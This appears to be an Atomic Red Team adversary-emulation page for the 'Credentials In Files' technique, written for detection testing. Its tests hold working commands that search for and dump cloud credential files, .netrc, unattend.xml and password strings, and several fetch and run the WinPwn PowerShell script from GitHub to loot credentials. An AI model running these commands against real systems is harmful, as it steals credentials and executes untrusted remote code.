Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.It is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping.(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
Find local AWS credentials from file, defaults to using / as the look path.
Supported Platforms: macOS, Linux
auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | / |
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
Supported Platforms: macOS
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
python2 laZagne.py all
Extracting credentials from files
Supported Platforms: Linux, macOS
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | / |
grep -ri password #{file_path}
exit 0
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Supported Platforms: Windows
auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Supported Platforms: Windows
auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Supported Platforms: Linux, macOS
auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | /home |
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Supported Platforms: Windows
auto_generated_guid: fdd0c913-714b-4c13-b40f-1824d6c015f2
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Supported Platforms: Windows
auto_generated_guid: 75f66e03-37d3-4704-9520-3210efbe33ce
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
Search for Passwords on this system using passhunt via WinPwn
Supported Platforms: Windows
auto_generated_guid: 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
rm -force .\passhunt.exe -ErrorAction Ignore
rm -force .\phunter* -ErrorAction Ignore
rm -force -recurse .\DomainRecon -ErrorAction Ignore
rm -force -recurse .\Exploitation -ErrorAction Ignore
rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
rm -force -recurse .\LocalRecon -ErrorAction Ignore
rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
Launches SessionGopher on this system via WinPwn
Supported Platforms: Windows
auto_generated_guid: c9dc9de3-f961-4284-bd2d-f959c9f9fda5
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: aaa87b0e-5232-4649-ae5c-f1724a4b2798
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Supported Platforms: Windows
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Supported Platforms: Windows
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
Find local Azure credentials from file, defaults to using / as the look path.
Supported Platforms: macOS, Linux
auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | / |
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Supported Platforms: macOS, Linux
auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | / |
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Supported Platforms: macOS, Linux
auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to search | string | / |
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null